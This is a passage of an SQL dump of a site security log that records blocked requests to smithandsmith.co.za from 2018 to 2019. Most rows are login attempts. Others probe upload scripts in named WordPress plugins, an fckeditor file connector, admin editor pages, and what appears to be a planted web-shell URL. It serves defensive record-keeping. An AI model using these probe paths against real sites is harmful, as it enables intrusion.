13:44:43','212.83.165.69','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(336,'2018-10-24 13:44:44','212.83.165.69','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(337,'2018-10-24 16:11:30','212.83.165.69','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(338,'2018-10-24 16:11:32','212.83.165.69','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(339,'2018-10-24 16:54:32','212.83.165.69','http://smithandsmith.co.za/wp-login.php','404shield',''),(340,'2018-10-24 16:54:33','212.83.165.69','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(341,'2018-10-24 17:43:00','212.83.165.69','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(342,'2018-10-24 19:57:51','212.83.165.69','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(343,'2018-10-24 21:53:38','201.43.150.53','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(344,'2018-10-24 22:14:55','212.83.165.69','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(345,'2018-10-24 23:59:25','112.196.135.39','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(346,'2018-10-25 06:22:44','103.103.58.113','http://smithandsmith.co.za/wp-login.php','404shield',''),(347,'2018-10-25 09:51:10','165.255.5.100','http://smithandsmith.co.za/wp-login.php','404shield',''),(348,'2018-10-25 10:50:27','5.245.15.72','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(349,'2018-10-26 02:05:38','219.145.144.65','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(350,'2018-10-26 02:05:41','219.145.144.65','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(351,'2018-10-26 02:42:43','36.81.202.248','http://smithandsmith.co.za/wp-login.php','404shield',''),(352,'2018-10-26 06:36:13','105.225.130.240','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(353,'2018-10-26 14:35:45','103.213.244.20','http://smithandsmith.co.za/wp-login.php','404shield',''),(354,'2018-10-26 14:35:45','103.213.244.20','http://smithandsmith.co.za/wp-login.php','404shield',''),(355,'2018-10-26 14:35:47','103.213.244.20','http://smithandsmith.co.za/wp-login.php','404shield',''),(356,'2018-10-26 14:35:47','103.213.244.20','http://smithandsmith.co.za/wp-login.php','404shield',''),(357,'2018-10-27 09:17:45','41.50.88.208','http://smithandsmith.co.za/wp-login.php','404shield',''),(358,'2018-10-27 13:18:00','178.137.19.88','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(359,'2018-10-27 13:18:03','178.137.19.88','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(360,'2018-10-27 13:18:05','178.137.19.88','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(361,'2018-10-27 13:59:04','212.83.165.69','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(362,'2018-10-27 13:59:08','212.83.165.69','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(363,'2018-10-28 19:53:38','178.33.45.73','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(364,'2018-10-29 16:47:06','103.213.244.20','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(365,'2018-10-29 16:47:06','103.213.244.20','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(366,'2018-10-29 23:57:24','37.115.184.171','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(367,'2018-10-30 02:53:39','37.115.184.171','http://smithandsmith.co.za/wp-login.php','404shield',''),(368,'2018-11-03 03:53:55','46.105.101.95','http://smithandsmith.co.za/wp-login.php','404shield',''),(369,'2018-11-03 11:20:34','103.12.123.102','http://smithandsmith.co.za/wp-login.php','404shield',''),(370,'2018-11-04 18:42:47','182.64.47.46','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(371,'2018-11-05 22:54:26','94.23.196.14','http://smithandsmith.co.za/wp-login.php','404shield',''),(372,'2018-11-05 22:54:28','94.23.196.14','http://smithandsmith.co.za/wp-login.php','404shield',''),(373,'2018-11-05 22:54:29','94.23.196.14','http://smithandsmith.co.za/wp-login.php','404shield',''),(374,'2018-11-06 04:59:07','94.23.196.14','http://smithandsmith.co.za/wp-login.php','404shield',''),(375,'2018-11-06 04:59:08','94.23.196.14','http://smithandsmith.co.za/wp-login.php','404shield',''),(376,'2018-11-06 04:59:09','94.23.196.14','http://smithandsmith.co.za/wp-login.php','404shield',''),(377,'2018-11-06 10:22:41','41.50.168.104','http://smithandsmith.co.za/wp-login.php','404shield',''),(378,'2018-11-06 21:36:45','47.88.237.70','http://smithandsmith.co.za/wp-login.php','404shield',''),(379,'2018-11-07 07:54:30','197.225.81.98','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(380,'2018-11-07 14:53:45','133.130.72.59','http://smithandsmith.co.za/wp-login.php','404shield',''),(381,'2018-11-09 20:38:40','192.95.30.29','http://smithandsmith.co.za/wp-login.php','404shield',''),(382,'2018-11-11 03:08:05','185.239.227.169','http://smithandsmith.co.za//wp-login.php','404shield',''),(383,'2018-11-11 03:08:05','185.239.227.169','http://smithandsmith.co.za//wp-login.php','404shield',''),(384,'2018-11-12 00:20:21','94.23.2.209','http://smithandsmith.co.za/wp-login.php','404shield',''),(385,'2018-11-12 00:20:22','94.23.2.209','http://smithandsmith.co.za/wp-login.php','404shield',''),(386,'2018-11-12 00:20:23','94.23.2.209','http://smithandsmith.co.za/wp-login.php','404shield',''),(387,'2018-11-12 03:39:04','192.95.31.42','http://smithandsmith.co.za/wp-content/uploads/2018/11/zgepd_oddsd.php?test=hello','404shield',''),(388,'2018-11-12 03:39:04','192.95.31.42','http://smithandsmith.co.za/wp-content/uploads/2018/11/zgepd_oddsd.php?test=hello','404shield',''),(389,'2018-11-12 08:53:37','189.148.145.86','http://smithandsmith.co.za/wp-login.php','404shield',''),(390,'2018-11-12 15:29:00','45.123.40.182','http://smithandsmith.co.za/wp-login.php','404shield',''),(391,'2018-11-12 19:38:28','192.99.35.63','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(392,'2018-11-12 19:38:28','192.99.35.63','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(393,'2018-11-12 19:38:32','192.99.35.63','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(394,'2018-11-12 19:38:32','192.99.35.63','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(395,'2018-11-14 23:21:58','159.69.37.186','http://www.smithandsmith.co.za//wp-admin/setup-config.php','404shield',''),(396,'2018-11-15 00:12:49','159.69.37.186','http://www.smithandsmith.co.za//wp-admin/setup-config.php','404shield',''),(397,'2018-11-15 08:07:49','192.99.35.63','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(398,'2018-11-15 08:07:49','192.99.35.63','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(399,'2018-11-15 19:16:28','190.46.89.215','http://smithandsmith.co.za/wp-login.php','404shield',''),(400,'2018-11-15 23:03:19','189.152.112.141','http://smithandsmith.co.za/wp-login.php','404shield',''),(401,'2018-11-16 10:59:13','59.88.245.27','http://smithandsmith.co.za/wp-login.php','404shield',''),(402,'2018-11-18 13:12:49','91.240.130.247','http://smithandsmith.co.za/wp-login.php','404shield',''),(403,'2018-11-21 10:09:16','188.133.176.58','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(404,'2018-11-22 10:27:49','216.244.65.12','http://smithandsmith.co.za/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php','404shield',''),(405,'2018-11-23 04:35:37','112.134.253.56','http://smithandsmith.co.za/wp-login.php','404shield',''),(406,'2018-11-23 20:54:04','94.102.57.141','http://smithandsmith.co.za/wp-admin/admin-ajax.php','404shield',''),(407,'2018-11-23 21:41:25','178.170.181.138','http://smithandsmith.co.za/wp-login.php','404shield',''),(408,'2018-11-25 03:58:53','209.90.225.115','http://smithandsmith.co.za/wp-content/plugins/wp-easy-gallery-pro/admin/php.php','404shield',''),(409,'2018-11-25 11:08:07','115.96.140.39','http://smithandsmith.co.za/wp-login.php','404shield',''),(410,'2018-11-26 04:26:34','192.99.35.63','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(411,'2018-11-26 04:26:34','192.99.35.63','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(412,'2018-11-26 06:14:04','192.99.35.63','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(413,'2018-11-26 06:14:04','192.99.35.63','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(414,'2018-11-28 01:21:45','216.244.65.11','http://www.smithandsmith.co.za/wp-content/themes/multimedia1/server/php/','404shield',''),(415,'2018-11-28 09:11:33','209.90.225.115','http://smithandsmith.co.za/wp-content/themes/nuance/style.css','404shield',''),(416,'2018-11-28 16:09:32','83.27.235.145','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(417,'2018-11-29 08:06:46','199.87.232.15','http://smithandsmith.co.za/wp-login.php','404shield',''),(418,'2018-11-29 08:06:47','199.87.232.15','http://smithandsmith.co.za/wp-login.php','404shield',''),(419,'2018-11-30 06:31:48','199.87.232.15','http://smithandsmith.co.za/wp-login.php','404shield',''),(420,'2018-11-30 06:31:48','199.87.232.15','http://smithandsmith.co.za/wp-login.php','404shield',''),(421,'2018-11-30 17:10:23','154.70.131.14','http://smithandsmith.co.za/wp-login.php','404shield',''),(422,'2018-12-01 02:08:08','209.90.225.115','http://www.smithandsmith.co.za/wp-content/plugins/dzs-portfolio/admin/dzsuploader/upload.js','404shield',''),(423,'2018-12-01 06:21:18','183.89.3.154','http://smithandsmith.co.za/wp-login.php','404shield',''),(424,'2018-12-01 17:39:18','197.89.156.8','http://smithandsmith.co.za/wp-login.php','404shield',''),(425,'2018-12-02 13:05:54','197.229.0.23','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(426,'2018-12-02 17:08:57','219.91.202.9','http://smithandsmith.co.za/wp-login.php','404shield',''),(427,'2018-12-03 00:27:42','94.47.135.16','http://smithandsmith.co.za/wp-login.php','404shield',''),(428,'2018-12-03 21:23:21','79.10.7.208','http://smithandsmith.co.za/wp-login.php','404shield',''),(429,'2018-12-03 23:01:49','195.191.183.169','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(430,'2018-12-04 07:13:12','77.229.137.141','http://smithandsmith.co.za/wp-login.php','404shield',''),(431,'2018-12-06 02:57:56','51.75.12.223','http://www.smithandsmith.co.za/wp-content/plugins/cherry-plugin/admin/js/upload-media-files.js','404shield',''),(432,'2018-12-06 17:17:29','209.90.225.115','http://www.smithandsmith.co.za/wp-content/plugins/dzs-zoomsounds/admin/upload.php','404shield',''),(433,'2018-12-06 20:58:30','176.132.82.13','http://smithandsmith.co.za/wp-login.php','404shield',''),(434,'2018-12-07 01:47:10','209.90.225.115','http://smithandsmith.co.za/wp-content/plugins/dzs-zoomsounds/admin/upload.php','404shield',''),(435,'2018-12-07 08:05:00','111.254.214.146','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(436,'2018-12-11 05:32:38','105.225.245.175','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(437,'2018-12-11 10:08:57','105.227.234.243','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(438,'2018-12-11 19:05:18','34.219.176.211','http://smithandsmith.co.za/wp-login.php','404shield',''),(439,'2018-12-12 04:37:59','90.174.2.84','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(440,'2018-12-12 11:52:34','36.232.42.92','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(441,'2018-12-12 17:53:00','191.23.98.18','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(442,'2018-12-14 02:07:15','189.175.250.225','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(443,'2018-12-14 09:19:05','77.230.62.135','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(444,'2018-12-15 07:34:34','31.176.245.78','http://smithandsmith.co.za/wp-login.php','404shield',''),(445,'2018-12-16 00:59:35','160.226.239.25','http://smithandsmith.co.za/wp-login.php','404shield',''),(446,'2018-12-18 10:37:36','105.225.109.185','http://smithandsmith.co.za/wp-login.php','404shield',''),(447,'2018-12-18 11:53:48','197.83.209.94','http://smithandsmith.co.za/wp-login.php','404shield',''),(448,'2018-12-18 14:31:09','177.242.130.44','http://smithandsmith.co.za/wp-login.php','404shield',''),(449,'2018-12-19 02:25:42','102.182.213.74','http://smithandsmith.co.za/wp-login.php','404shield',''),(450,'2018-12-19 17:03:21','188.50.156.224','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(451,'2018-12-19 19:57:24','109.146.75.128','http://smithandsmith.co.za/wp-login.php','404shield',''),(452,'2018-12-24 08:39:05','105.227.27.8','http://smithandsmith.co.za/wp-login.php','404shield',''),(453,'2018-12-24 19:53:04','197.245.53.93','http://smithandsmith.co.za/wp-login.php','404shield',''),(454,'2018-12-27 00:09:45','185.163.46.23','http://www.smithandsmith.co.za/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php','404shield',''),(455,'2018-12-27 06:13:04','90.161.132.71','http://smithandsmith.co.za/wp-login.php','404shield',''),(456,'2018-12-27 21:40:21','118.184.47.13','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(457,'2018-12-27 21:40:21','118.184.47.13','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(458,'2018-12-28 06:56:14','41.164.72.2','http://smithandsmith.co.za/wp-login.php','404shield',''),(459,'2018-12-28 20:03:33','1.23.139.98','http://smithandsmith.co.za/wp-login.php','404shield',''),(460,'2018-12-29 14:11:07','106.73.167.32','http://smithandsmith.co.za/wp-login.php','404shield',''),(461,'2018-12-30 08:01:07','185.225.17.191','http://www.smithandsmith.co.za/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php','404shield',''),(462,'2018-12-30 17:50:06','185.225.17.191','http://smithandsmith.co.za/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php','404shield',''),(463,'2018-12-31 04:47:12','5.45.65.152','http://www.smithandsmith.co.za//wp-content/plugins/cherry-plugin/admin/css/cherry-admin-plugin.css','404shield',''),(464,'2018-12-31 19:31:15','41.57.133.60','http://smithandsmith.co.za/wp-login.php','404shield',''),(465,'2018-12-31 19:34:37','69.165.203.114','http://smithandsmith.co.za/wp-login.php','404shield',''),(466,'2019-01-02 13:32:49','85.90.221.208','http://smithandsmith.co.za/wp-login.php','404shield',''),(467,'2019-01-03 09:26:34','185.225.17.191','http://www.smithandsmith.co.za/wp-content/plugins/photo-gallery/filemanager/UploadHandler.php','404shield',''),(468,'2019-01-03 16:59:09','185.225.17.191','http://smithandsmith.co.za/wp-content/plugins/photo-gallery/filemanager/UploadHandler.php','404shield',''),(469,'2019-01-04 04:58:25','94.158.245.114','http://smithandsmith.co.za/wp-content/plugins/formcraft/file-upload/server/php/upload.php','404shield',''),(470,'2019-01-04 05:51:00','192.99.1.38','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(471,'2019-01-04 05:51:00','192.99.1.38','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(472,'2019-01-05 10:11:51','82.202.167.56','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(473,'2019-01-05 10:11:54','82.202.167.56','http://www.smithandsmith.co.za//administrator/index.php','adminpw',''),(474,'2019-01-05 13:20:27','103.252.203.170','http://smithandsmith.co.za/wp-login.php','404shield',''),(475,'2019-01-06 04:33:49','93.86.104.108','http://smithandsmith.co.za/wp-login.php','404shield',''),(476,'2019-01-06 13:19:18','45.220.15.129','http://smithandsmith.co.za/wp-login.php','404shield',''),(477,'2019-01-07 09:33:17','46.153.30.77','http://smithandsmith.co.za/wp-login.php','404shield',''),(478,'2019-01-10 18:12:41','91.160.8.166','http://smithandsmith.co.za/wp-login.php','404shield',''),(479,'2019-01-12 06:05:46','191.5.229.26','http://smithandsmith.co.za/wp-login.php','404shield',''),(480,'2019-01-13 21:25:48','88.214.26.56','http://smithandsmith.co.za/wp-content/plugins/advanced-booking-calendar/frontend/css/styles.css','404shield',''),(481,'2019-01-14 12:00:08','23.228.96.82','http://www.smithandsmith.co.za/wp-content/plugins/wp-easy-gallery-pro/admin/php.php','404shield',''),(482,'2019-01-14 18:01:53','41.78.38.195','http://smithandsmith.co.za/wp-login.php','404shield',''),(483,'2019-01-14 20:08:29','23.228.96.82','http://smithandsmith.co.za/wp-content/plugins/wp-easy-gallery-pro/admin/php.php','404shield',''),(484,'2019-01-15 12:35:00','186.66.60.25','http://smithandsmith.co.za/wp-login.php','404shield',''),(485,'2019-01-15 15:39:19','192.99.35.135','http://smithandsmith.co.za/wp-content/plugins/userpro/scripts/scripts.min.js','404shield',''),(486,'2019-01-15 15:39:20','192.99.35.135','http://smithandsmith.co.za/wp-content/plugins/userpro/scripts/scripts.min.js','404shield',''),(487,'2019-01-17 07:24:59','122.164.77.134','http://smithandsmith.co.za/wp-login.php','404shield',''),(488,'2019-01-17 13:59:38','94.69.95.215','http://smithandsmith.co.za/wp-login.php','404shield',''),(489,'2019-01-19 06:55:04','107.173.62.192','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(490,'2019-01-19 06:55:05','107.173.62.192','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(491,'2019-01-20 17:58:59','37.229.182.154','http://smithandsmith.co.za/wp-login.php','404shield',''),(492,'2019-01-22 05:20:48','198.27.70.45','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(493,'2019-01-22 05:20:48','198.27.70.45','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(494,'2019-01-22 10:17:30','23.228.96.82','http://smithandsmith.co.za/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/css/jquery.lightbox.css','404shield',''),(495,'2019-01-22 16:47:58','88.214.26.83','http://smithandsmith.co.za/wp-content/plugins/show-all-comments-in-one-page/css/sac-style.css','404shield',''),(496,'2019-01-23 09:29:24','51.68.253.19','http://smithandsmith.co.za/wp-admin/setup-config.php?step=1','404shield',''),(497,'2019-01-23 22:04:49','23.228.96.82','http://www.smithandsmith.co.za/wp-content/plugins/wp-easy-gallery-pro/admin/php.php','404shield',''),(498,'2019-01-24 08:55:04','23.228.96.82','http://smithandsmith.co.za/wp-content/plugins/wp-easy-gallery-pro/admin/php.php','404shield',''),(499,'2019-01-25 12:41:24','88.214.26.83','http://smithandsmith.co.za/wp-content/plugins/video-list-manager/css/style.css','404shield',''),(500,'2019-01-25 22:16:08','23.228.96.82','http://www.smithandsmith.co.za/wp-content/plugins/dzs-zoomsounds/admin/upload.php','404shield',''),(501,'2019-01-26 07:14:09','136.243.95.112','http://smithandsmith.co.za/wp-login.php','404shield',''),(502,'2019-01-26 07:27:05','23.228.96.82','http://smithandsmith.co.za/wp-content/plugins/dzs-zoomsounds/admin/upload.php','404shield',''),(503,'2019-01-27 05:26:01','180.177.12.171','http://smithandsmith.co.za/wp-login.php','404shield',''),(504,'2019-01-27 15:36:01','157.32.236.72','http://smithandsmith.co.za/wp-login.php','404shield',''),(505,'2019-01-27 20:48:16','91.125.9.14','http://smithandsmith.co.za/wp-login.php','404shield',''),(506,'2019-01-28 00:00:37','88.214.26.83','http://smithandsmith.co.za/wp-admin/admin-ajax.php?action=jsticket_ajax&jstmod=fieldordering&task=getOptionsForFieldEdit&field=1','404shield',''),(507,'2019-01-28 06:27:52','197.245.83.229','http://smithandsmith.co.za/wp-login.php','404shield',''),(508,'2019-01-28 09:25:28','182.191.113.94','http://smithandsmith.co.za/wp-login.php','404shield',''),(509,'2019-01-28 15:33:44','46.17.150.226','http://smithandsmith.co.za/wp-login.php','404shield',''),(510,'2019-01-28 17:08:34','160.226.248.54','http://smithandsmith.co.za/wp-login.php','404shield',''),(511,'2019-01-30 12:32:23','88.214.26.56','http://smithandsmith.co.za/wp-admin/admin-ajax.php','404shield',''),(512,'2019-01-30 22:13:00','5.45.65.152','http://www.smithandsmith.co.za//wp-content/plugins/wp-special-textboxes/stb-uploader.php','404shield',''),(513,'2019-01-31 00:57:18','192.99.0.107','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(514,'2019-01-31 00:57:18','192.99.0.107','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(515,'2019-01-31 00:57:19','192.99.0.107','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(516,'2019-01-31 00:57:19','192.99.0.107','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(517,'2019-01-31 01:15:11','118.184.47.13','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(518,'2019-01-31 01:15:12','118.184.47.13','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(519,'2019-01-31 06:59:52','27.57.151.211','http://smithandsmith.co.za/wp-login.php','404shield',''),(520,'2019-01-31 07:30:19','191.189.12.84','http://smithandsmith.co.za/wp-login.php','404shield',''),(521,'2019-01-31 16:45:54','219.90.108.180','http://smithandsmith.co.za/wp-login.php','404shield',''),(522,'2019-01-31 23:00:32','62.210.90.220','http://smithandsmith.co.za/wp-login.php','404shield',''),(523,'2019-01-31 23:00:32','62.210.90.220','http://smithandsmith.co.za/wp-login.php','404shield',''),(524,'2019-02-01 02:35:43','105.225.195.118','http://smithandsmith.co.za/wp-login.php','404shield',''),(525,'2019-02-01 07:04:32','94.23.196.14','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(526,'2019-02-01 07:04:32','94.23.196.14','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(527,'2019-02-03 07:58:29','92.217.8.99','http://smithandsmith.co.za/wp-login.php','404shield',''),(528,'2019-02-03 11:00:43','107.173.62.192','http://smithandsmith.co.za/wp-login.php','404shield',''),(529,'2019-02-03 11:00:44','107.173.62.192','http://smithandsmith.co.za/wp-login.php','404shield',''),(530,'2019-02-04 16:14:34','27.254.201.140','http://smithandsmith.co.za/wp-login.php','404shield',''),(531,'2019-02-06 06:07:41','157.46.41.219','http://smithandsmith.co.za/wp-login.php','404shield',''),(532,'2019-02-06 13:40:37','177.95.242.185','http://smithandsmith.co.za/wp-login.php','404shield',''),(533,'2019-02-07 12:04:32','192.99.35.135','http://smithandsmith.co.za/wp-content/plugins/totaldonations/js/migla_authorize_settings.js','404shield',''),(534,'2019-02-07 12:04:34','192.99.35.135','http://smithandsmith.co.za/wp-content/plugins/totaldonations/js/migla_authorize_settings.js','404shield',''),(535,'2019-02-07 20:23:48','223.223.143.199','http://smithandsmith.co.za/wp-login.php','404shield',''),(536,'2019-02-12 16:36:04','129.208.239.90','http://smithandsmith.co.za/wp-login.php','404shield',''),(537,'2019-02-13 14:07:58','180.244.50.32','http://smithandsmith.co.za/wp-login.php','404shield',''),(538,'2019-02-16 05:06:32','41.160.233.82','http://smithandsmith.co.za/wp-login.php','404shield',''),(539,'2019-02-18 00:15:03','46.118.121.162','http://smithandsmith.co.za/mambots/editors/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/','dfishield',''),(540,'2019-02-19 15:39:27','134.73.199.154','http://www.smithandsmith.co.za/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php','404shield',''),(541,'2019-02-20 01:27:20','134.73.199.154','http://smithandsmith.co.za/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php','404shield',''),(542,'2019-02-20 17:19:30','160.226.139.8','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(543,'2019-02-21 09:38:29','134.73.199.154','http://www.smithandsmith.co.za/wp-content/plugins/wp-easy-gallery-pro/admin/php.php','404shield',''),(544,'2019-02-21 14:25:51','134.73.199.154','http://smithandsmith.co.za/wp-content/plugins/wp-easy-gallery-pro/admin/php.php','404shield',''),(545,'2019-02-22 12:31:35','105.226.56.101','http://smithandsmith.co.za/wp-login.php','404shield',''),(546,'2019-02-22 22:47:00','134.73.199.154','http://www.smithandsmith.co.za/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php','404shield',''),(547,'2019-02-23 06:20:50','134.73.199.154','http://smithandsmith.co.za/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php','404shield',''),(548,'2019-02-24 22:00:50','168.70.62.40','http://smithandsmith.co.za/wp-login.php','404shield',''),(549,'2019-02-25 18:01:58','94.207.89.242','http://smithandsmith.co.za/wp-login.php','404shield',''),(550,'2019-02-25 21:14:18','178.62.76.185','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(551,'2019-02-26 21:33:32','196.209.218.160','http://smithandsmith.co.za/wp-login.php','404shield',''),(552,'2019-02-27 16:54:54','178.175.143.156','http://smithandsmith.co.za/wp-admin/post-new.php','404shield',''),(553,'2019-02-27 16:54:58','178.175.143.156','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(554,'2019-02-27 16:55:08','178.175.143.156','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(555,'2019-02-27 18:32:50','139.59.16.86','http://smithandsmith.co.za/wp-login.php','404shield',''),(556,'2019-02-27 22:06:54','87.118.110.27','http://smithandsmith.co.za/wp-admin/post-new.php','404shield',''),(557,'2019-02-27 22:06:55','87.118.110.27','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(558,'2019-02-27 22:06:56','87.118.110.27','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(559,'2019-02-27 22:07:46','5.196.1.129','http://smithandsmith.co.za/wp-admin/post-new.php','404shield',''),(560,'2019-02-27 22:07:48','5.196.1.129','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(561,'2019-02-27 22:07:49','5.196.1.129','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(562,'2019-02-28 04:09:33','178.175.132.211','http://smithandsmith.co.za/wp-admin/post-new.php','404shield',''),(563,'2019-02-28 04:09:34','178.175.132.211','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(564,'2019-02-28 04:09:35','178.175.132.211','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(565,'2019-02-28 04:10:03','54.39.148.234','http://smithandsmith.co.za/wp-admin/post-new.php','404shield',''),(566,'2019-02-28 04:10:04','54.39.148.234','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(567,'2019-02-28 04:10:05','54.39.148.234','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(568,'2019-02-28 04:11:10','51.15.56.18','http://smithandsmith.co.za/wp-admin/post-new.php','404shield',''),(569,'2019-02-28 04:11:31','51.15.56.18','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(570,'2019-02-28 04:11:34','51.15.56.18','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(571,'2019-02-28 04:11:42','162.220.162.10','http://smithandsmith.co.za/wp-admin/post-new.php','404shield',''),(572,'2019-02-28 08:46:35','178.175.132.225','http://smithandsmith.co.za/wp-admin/post-new.php','404shield',''),(573,'2019-02-28 08:46:36','178.175.132.225','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(574,'2019-02-28 08:46:57','178.175.132.225','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(575,'2019-02-28 08:58:25','209.141.37.237','http://smithandsmith.co.za/wp-admin/post-new.php','404shield',''),(576,'2019-02-28 08:59:00','209.141.37.237','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(577,'2019-02-28 08:59:09','209.141.37.237','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(578,'2019-02-28 09:00:50','162.247.74.199','http://smithandsmith.co.za/wp-admin/post-new.php','404shield',''),(579,'2019-02-28 09:01:08','162.247.74.199','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(580,'2019-02-28 09:01:17','162.247.74.199','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(581,'2019-02-28 11:17:20','35.164.189.79','http://smithandsmith.co.za/wp-login.php','404shield',''),(582,'2019-02-28 11:23:40','74.178.40.114','http://smithandsmith.co.za/wp-login.php','404shield',''),(583,'2019-02-28 21:07:40','190.163.238.235','http://smithandsmith.co.za/wp-login.php','404shield',''),(584,'2019-03-01 13:49:57','109.0.33.27','http://smithandsmith.co.za/wp-login.php','404shield',''),(585,'2019-03-02 00:05:24','148.71.160.212','http://smithandsmith.co.za/wp-login.php','404shield',''),(586,'2019-03-02 03:51:04','88.147.50.240','http://smithandsmith.co.za/wp-login.php','404shield',''),(587,'2019-03-03 02:01:32','134.73.199.154','http://www.smithandsmith.co.za/wp-content/themes/headway-16/style.css','404shield',''),(588,'2019-03-03 13:39:08','134.73.199.154','http://smithandsmith.co.za/wp-content/themes/headway-16/style.css','404shield',''),(589,'2019-03-03 16:55:18','2.51.191.138','http://smithandsmith.co.za/wp-login.php','404shield',''),(590,'2019-03-04 13:57:25','2.87.145.171','http://smithandsmith.co.za/wp-login.php','404shield',''),(591,'2019-03-04 16:03:46','78.85.162.140','http://www.smithandsmith.co.za//wp-content/plugins/WP_Estimation_Form/assets/css/lfb_frontendPackedLibs.min.css','404shield',''),(592,'2019-03-04 18:22:27','111.88.132.184','http://smithandsmith.co.za/wp-login.php','404shield',''),(593,'2019-03-05 00:25:38','134.73.199.154','http://www.smithandsmith.co.za/wp-content/themes/headway-162/style.css','404shield',''),(594,'2019-03-05 07:37:16','134.73.199.154','http://smithandsmith.co.za/wp-content/themes/headway-162/style.css','404shield',''),(595,'2019-03-05 23:16:49','62.210.83.201','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(596,'2019-03-05 